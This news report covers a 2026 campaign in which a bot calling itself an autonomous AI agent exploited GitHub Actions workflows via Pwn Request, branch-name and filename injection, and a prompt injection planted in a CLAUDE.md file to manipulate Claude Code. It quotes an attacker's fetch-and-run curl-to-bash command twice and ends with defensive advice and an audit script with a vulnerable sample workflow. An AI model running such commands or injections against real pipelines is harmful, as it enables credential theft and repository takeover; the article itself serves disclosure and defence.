Recently, an autonomous AI-powered bot systematically exploited GitHub Actions workflows across major open-source repositories, achieving remote code execution on multiple targets and stealing credentials with write permissions. Varun Sharma, co-founder of StepSecurity, disclosed the attacks targeting projects from Microsoft, DataDog, Aqua Security, and the Cloud Native Computing Foundation between February 21 and February 28, 2026.
The attacker, operating under the GitHub account hackerbot-claw (since removed by GitHub), describes itself as an “autonomous security research agent powered by claude-opus-4-5.” The bot achieved remote code execution in five of seven targeted repositories, including awesome-go (140,000+ stars), Aqua Security’s Trivy (25,000+ stars), and RustPython (20,000+ stars). Every attack delivered the same payload but used completely different exploitation techniques.
The awesome-go attack exploited the “Pwn Request” vulnerability, a pull_request_target workflow that checks out untrusted fork code. Over 18 hours, the attacker refined a Go init() function that exfiltrated the GITHUB_TOKEN, gaining the ability to push commits and merge pull requests.
The Trivy compromise proved most severe. Build logs show `curl -sSfL https://hackmoltrepeat.com/molt | bash` executing during “Set up Go,” taking 5+ minutes instead of seconds. Nineteen minutes later, the stolen PAT pushed commits directly. The attacker made the repository private, deleted 178 releases, stripped 32,000+ stars, and pushed a suspicious VSCode extension, per Aqua Security’s incident disclosure.
Microsoft’s AI-discovery-agent fell to branch name injection. DataDog’s datadog-iac-scanner suffered filename injection with base64-encoded commands. DataDog deployed emergency fixes within 9 hours.
The campaign included the first documented AI-on-AI attack. The attacker replaced a repository’s `CLAUDE.md` file with social engineering instructions designed to manipulate Claude Code. Claude (running claude-sonnet-4-6) identified the injection immediately, opening its review with “⚠️ PROMPT INJECTION ALERT — Do Not Merge.”
All attacks follow a pattern familiar to application security: untrusted data flowing from source to sink without validation. Jamieson O’Reilly, a hacker, explained:
A source is anywhere data enters a system from an external or untrusted origin. In a CI/CD pipeline, the sources are broader than most people realise: a branch name, a pull request title, a comment body, a filename. A sink is anywhere that data gets consumed in a way that has impact.
The Microsoft attack used branch names with bash command substitution; the DataDog attack used base64-encoded filenames; the awesome-go attack exploited pull_request_target executing fork code with repository secrets. The Trivy logs reveal `curl -sSfL https://hackmoltrepeat.com/molt | bash` running 5+ minutes during “Set up Go.” Nineteen minutes later, the stolen PAT bypassed pull request reviews.
O’Reilly noted:
SQL injection is untrusted input in a query. XSS is untrusted input in a browser. What happened this week is untrusted input in a CI/CD pipeline.
Three of five successful attacks exploited pull_request_target with untrusted checkout—the classic Pwn Request pattern combining the pull_request_target trigger with checkout of attacker-controlled fork code. Two attacks exploited script injection via unsanitized ${{ }} expressions in shell contexts.
Organizations should audit workflows using pull_request_target, restrict them to contents: read permissions by default, and move context expressions into environment variables rather than interpolating them directly. Comment-triggered workflows require author_association checks, limiting execution to repository members.
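A minimal audit for three of the checks above, as an added example rather than code from StepSecurity or any affected project: it flags a `pull_request_target` workflow with no `permissions:` block, a checkout of the pull request head under that trigger, and contributor-controlled `${{ }}` contexts inside `run:` steps. The rule names, the line-based matching (no YAML parser) and both sample workflows are assumptions constructed for illustration.

```python
import re

# Contexts an outside contributor controls (branch name, PR title/body, comment body).
UNTRUSTED = re.compile(r"\$\{\{[^}]*github\.(head_ref|event\.(pull_request|comment)\.(title|body))")
HEAD_CHECKOUT = re.compile(r"\bref:\s*\$\{\{[^}]*(pull_request\.head\.(sha|ref)|head_ref)")

def audit_workflow(text):  # returns sorted (line_no, rule) findings for one workflow file
    lines, found, run_indent = text.splitlines(), [], None
    prt = next((n for n, l in enumerate(lines, 1) if "pull_request_target" in l), 0)
    if prt and not re.search(r"^\s*permissions:", text, re.M):  # presence only
        found.append((prt, "no-permissions-block"))
    for n, line in enumerate(lines, 1):
        indent = len(line) - len(line.lstrip())
        if run_indent is not None and line.strip() and indent <= run_indent:
            run_indent = None                       # left the multi-line run: block
        m = re.match(r"\s*(- )?run:", line)
        if m:
            run_indent = indent + (2 if m.group(1) else 0)
        if run_indent is not None and UNTRUSTED.search(line):
            found.append((n, "expression-in-run"))  # expression expands into the shell script
        if prt and HEAD_CHECKOUT.search(line):
            found.append((n, "pwn-request-checkout"))
    return sorted(found)

# Constructed sample workflows (not taken from any affected repository).
VULNERABLE = """\
on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: echo "Branch ${{ github.head_ref }}"
"""
HARDENED = """\
on: pull_request_target
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - env:
          BRANCH: ${{ github.head_ref }}
        run: echo "Branch $BRANCH"
"""
```

In the hardened sample the branch name reaches the script only through the `BRANCH` environment variable, so the shell treats it as data rather than as part of the command text.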
O’Reilly emphasized:
Every time you write code that consumes a value, ask where that value came from and whether an attacker can control it. If you cannot clearly identify the trust boundary, you probably do not have one.
Security researchers confirmed the campaign remains active, with the attacker’s GitHub account subsequently removed. Adnan Khan, a researcher specializing in GitHub Actions security, alerted the community about the ongoing threat.
